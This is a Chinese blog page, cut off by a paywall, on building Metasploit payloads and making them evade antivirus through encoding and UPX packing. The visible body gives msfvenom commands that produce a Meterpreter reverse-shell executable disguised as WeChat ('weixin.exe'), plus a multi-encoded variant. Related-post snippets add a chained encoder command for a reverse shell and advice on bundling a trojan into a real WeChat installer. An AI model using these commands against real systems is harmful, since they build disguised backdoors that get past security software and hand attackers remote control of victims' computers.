MSF编码与upx加壳过杀软

最新推荐文章于 2024-08-20 12:35:43 发布
最新推荐文章于 2024-08-20 12:35:43 发布
阅读量2.3k 收藏 18
点赞数 2
分类专栏: 全栈网络安全 渗透测试 代码审计 网络安全工具开发 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35029061/article/details/126116254
版权
本文详细介绍了如何使用Metasploit(MSF)创建攻击载荷并进行免杀处理,包括MSF编码、多重编码以及使用UPX加壳和脱壳,以绕过杀毒软件的检测。通过实验展示了如何生成和测试免杀的木马文件,并使用在线杀毒检测工具验证效果。
摘要由CSDN通过智能技术生成

本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件。

一、免杀

免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描。

裸奔马的尝试

意为不做任何免杀处理的WebShell。

1、使用msf的msfvenom生成木马文件,生成一个裸奔马,命名为 weixin.exe吧。

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe
Or
┌──(root💀kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhosts=192.168.1.113 lport=3333 -e cmd/echo -i 10 -f exe -o cmd_echo_113_3333_10.exe               1 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch:
了解本专栏 订阅专栏 解锁全文 超级会员免费看
wespten
关注
专栏目录
订阅专栏
linux下最好用的upx加壳工具
12-23
upx是一个用的最多的加壳工具,有效的防止程序被人进行反编译破解 这个是linux 下32位
msf编码
m0_61506558的博客
09-03 2597
编码处理自捆绑+编码多重编码接口下载式签名伪装式
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
baimao__Ch的博客
08-15 1099
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。最后。
使用Metasploit生成攻击载荷——msfvenom免upx加壳
渗透测试
06-06 7700
文章目录前言一、免1.msfvenom的使用2.多重编码二、加壳1.upx的使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免加壳处理,从而突破件 一、免字面意思就是避免被掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被件干掉,使用相关技术让载荷躲过件的扫描 1.msfvenom的使用 ┌──(root????kali)-[~] └─# msfvenom info
metasploit使用msf编码
天元喜羊羊的博客
04-29 3503
root@bt:~# msfencode -l Framework Encoders ================== Name Rank Description ---- ---- ----------- cmd/generic_sh
msfvenom木马生成+免+壳(实测并不能免)
weixin_34342992的博客
02-14 1646
msfvenom 选项: -p, --payload 有效载荷使用。指定一个有效的自定义载荷 --payload-options 列出有效载荷的标准选项 -l, --list [type] 列出一个模块类型。选项有:有效载荷,编码器,NOP,所有 -n, --nopsled 在一个nopsled [长度]的大小对有效载荷 -f, --format 输出格式(使用-一个列表的帮助格式) --...
Metasploit教程:msfpayload和msfencode
10-07 1568
网上说用msfpayload 生成什么注入进程什么攻击后门,后边的注入进程是吓唬人的,就是一种进程隐藏技术不理解没关系(解释一下:进程注入是指将可恶意的可执行代码注入到一个已经运行的进程一般是合法系统进程,达到来隐藏自身的目的。     msfpayload 这个工具主要的功能就是将Metasploit 中的payloads(工具载荷)包装成一个可执行的文件,或者包装成指定的类型,msfpayl
MSF学习
willow_liang的博客
12-03 1983
目录 Metasploit模块 主机扫描 查找扫描模块 使用扫描模块 使用nmap扫描 搜索和使用samba的漏洞利用模块 后渗透攻击:信息收集 使用ms17-010对win7进行渗透 进程迁移 查看系统信息 截图 文件系统命令 权限提升 将meterpreter转换为后台执行 令牌窃取 hash攻击 或者上传pwdump,wce工具获取hash 使用mimikatz抓取密码 后渗透攻击:后门 1.Cymothoa后门 2.Persistence后门 3.w.
渗透测试-木马免的几种方式
MSB_WLAQ的博客
09-28 4707
前言 免,又叫免毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被件查件。它除了使病毒木马免于被查外,还可以扩增病毒木马的功能,改变病毒木马的行为。免的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免就能完成了。免技术也并不是十恶不赦的,例如,在件保护所用的加密产品(比如壳)中,有一些会被件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被件误,这时就需要免技术来应对这些不稳定因素。 1、裸
msfvenom常规编码器(encoder)免
afei001
03-27 1296
实验环境 攻击机:kali IP:192.168.3.150 靶机:windows7 x64 IP:192.168.3.176 1. 编码器选项 root@afei:~# msfvenom --list encoders #列出可用的编码器 Framework Encoders [--encoder <value>] ...
加壳工具的使用
我还在的博客
10-09 5146
加壳工具的使用0x01 前言0x01 加壳简介0x02 ASPack加壳0x03 PE-Armor加壳 0x01 前言 这是我对加壳工具的使用的学习记录。 0x01 加壳简介 1.加壳:是一种通过一系列数学运算,将可执行程序文件(EXE)或动态链接库文件(DLL)的编码进行改变(目前加壳件还可以压缩、加密),以达到缩小文件体积或加密程序编码的目的。当被加壳的程序运行时,外壳程序先被执行,然后由这...
方法(九)msf加密壳免
qq_56426046的博客
10-04 543
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
木马加壳
超哥的专栏
04-24 1546
输入参数 输出参数 检测选项 保护特性 保护
metasploit加壳upx
天元喜羊羊的博客
05-01 6299
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikat
MSF使用详解
m0_52051132的博客
10-19 8147
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被件监测到。
【网络安全】木马免方式——加壳
最新发布
QIANDXX的博客
08-20 567
2、在msf的/data/templates/下有很多metasploit自带的用于捆绑木马的程序模板,这个模块但是一些反病毒厂商关注的重点,为了更好的实现免,我们需要自主选择一个待捆绑程序。在这里选择是真正的微信安装包。(也有对裸奔马进行shikata_ga_nai编码饶AV的方法,但是shikata_ga_nai编码技术多态,每次生成的攻击载荷文件都不一样,有时生成的文件会被查,有时不会,所以结合以上思路,生成一个捆绑木马,并进行shikata_ga_nai编码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wespten

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值